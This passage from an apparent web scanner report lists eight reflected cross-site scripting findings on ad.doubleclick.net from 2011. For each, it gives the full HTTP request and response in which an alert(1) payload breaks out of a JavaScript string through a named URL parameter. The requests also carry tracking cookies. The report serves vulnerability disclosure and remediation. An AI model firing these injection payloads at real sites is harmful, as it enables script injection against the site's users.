5.55. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ac2c9"-alert(1)-"a68a2b26d28 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&ac2c9"-alert(1)-"a68a2b26d28=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 16:03:03 GMT
Content-Length: 8154

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=&ac2c9"-alert(1)-"a68a2b26d28=1http://www.cosmopolitanlasvegas.com/stay/packages/sun-and-nights.aspx/?ic_campID=2&ic_pkw=Media6+SocialRetargeting+SunAndNights&utm_source=Media6&utm_medium=display&utm_content=SunAndNights&utm_campa
...[SNIP]...

5.56. http://ad.doubleclick.net/adi/N4682.154173.9484049199421/B5387915.3 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N4682.154173.9484049199421/B5387915.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f58a"-alert(1)-"e76dfae306f was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=4f58a"-alert(1)-"e76dfae306f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3;sz=160x600;ord=1305126978042;click0=http://ad.media6degrees.com/adserv/clk?tId=17180888721769508|cId=6483|cb=1305126976|notifyPort=8080|exId=22|tId=17180888721769508|ec=1|secId=396|price=1.6974|pubId=526|advId=1244|notifyServer=asd133.sd.pl.pvt|spId=22073|adType=ad|invId=2276|bid=1.90|ctrack=http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?clickData=J2YAADdmAADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 16:02:23 GMT
Content-Length: 8008

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
AADsUQAAUQcAAAAAAAAAAAAAAAAAAAEAAAAAAAAA8wAAAKAAAABYAgAAAAAAAAIAAAAyOUU0M0Q4Ri01MkM1LTRDN0ItQjJFQS0wMTgxNDk2RTY2NzEAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAABOQ09MT1IAAAAAAE5DT0xPUgAAAAAATkNPTE9SAAAAAA==_url=4f58a"-alert(1)-"e76dfae306fhttp://www.cosmopolitanlasvegas.com/stay/packages/book3-stay4.aspx/?ic_campID=2&ic_pkw=Media6+SocialRetargeting+Book3Stay4&utm_source=Media6&utm_medium=display&utm_content=Book3Stay4&utm_campaign=DR");
...[SNIP]...

5.57. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a90a"-alert(1)-"11a49fb03de was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=1a90a"-alert(1)-"11a49fb03de HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7447
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 11 May 2011 15:53:46 GMT
Expires: Wed, 11 May 2011 15:53:46 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
Fzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=1a90a"-alert(1)-"11a49fb03dehttps://www.hiltonhhonors.com/landingpages/GrandNights.aspx?lang=EN&WT.mc_id=zEWWABB0US1HN2DMH411Q027HE840724&cssiteid=1004575&csdartid=6115818341094506");
var fscUrl = url;
var fscUrlClickTagFound =
...[SNIP]...

5.58. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b99"-alert(1)-"27c743e65b4 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQBd7b99"-alert(1)-"27c743e65b4&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:50:41 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
J2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQBd7b99"-alert(1)-"27c743e65b4&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/GrandNights.aspx%3Flang%3DEN%26WT.mc_id%3DzEWWABB0US1HN2DMH411Q027HE8
...[SNIP]...

5.59. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6884"-alert(1)-"7d9b4c2e543 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807c6884"-alert(1)-"7d9b4c2e543&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:52:59 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807c6884"-alert(1)-"7d9b4c2e543&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/GrandNights.aspx%3Flang%3DEN%26WT.mc_id%3DzEWWABB0US1HN2DMH411Q027HE840724%26cssiteid%3D1004575%26csdartid%3D6115818341094506");
var fscUrl = ur
...[SNIP]...

5.60. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16f98"-alert(1)-"8c42d1cf222 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=116f98"-alert(1)-"8c42d1cf222&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:51:23 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
HR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=116f98"-alert(1)-"8c42d1cf222&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/GrandNights.aspx%3Flang%3DEN%26WT.mc_id%3DzEWWABB0US1HN2DMH411Q027HE840724%
...[SNIP]...

5.61. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cc18b"-alert(1)-"bd786cf5675 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=L&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTwcc18b"-alert(1)-"bd786cf5675&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:52:12 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
aW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTwcc18b"-alert(1)-"bd786cf5675&client=ca-pub-9674942009345807&adurl=https%3a%2f%2fwww.hiltonhhonors.com/landingpages/GrandNights.aspx%3Flang%3DEN%26WT.mc_id%3DzEWWABB0US1HN2DMH411Q027HE840724%26cssiteid%3D1004575%26csdartid%3D61158
...[SNIP]...

5.62. http://ad.doubleclick.net/adi/N5552.3159.GOOGLECN.COM/B5270832.35 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5552.3159.GOOGLECN.COM/B5270832.35

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d0d27"-alert(1)-"77fb79f0b33 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5552.3159.GOOGLECN.COM/B5270832.35;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=Ld0d27"-alert(1)-"77fb79f0b33&ai=BslVmUqXKTaXVCY_tlQfRr6nZArbap6cC_vHEuirAjbcBABABGAEgn4j1ATgAYMmGhYmIpIQQsgERd3d3LnN0YXJwdWxzZS5jb226AQoxNjB4NjAwX2FzyAEJ2gFZaHR0cDovL3d3dy5zdGFycHVsc2UuY29tL25ld3MvaW5kZXgucGhwLzIwMTEvMDUvMDgvZGF2aWRfaGFzc2VsaG9mZl9jb25mcm9udHNfcGllcnNfbW9yZ2HgAQaYAqYOuAIYyALO94Md4AIA6gIITmV3cy1Ta3mQA6QDmAPgA6gDAegD-wfoA8sB9QMAAADE4AQB&num=1&sig=AGiWqtxIOFZ4lNhT4DWMiTYR8ITIlQypTw&client=ca-pub-9674942009345807&adurl=;ord=2121286046? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:50:06 GMT
Content-Length: 7513

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Wed Mar 09 18:33:31 EST 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
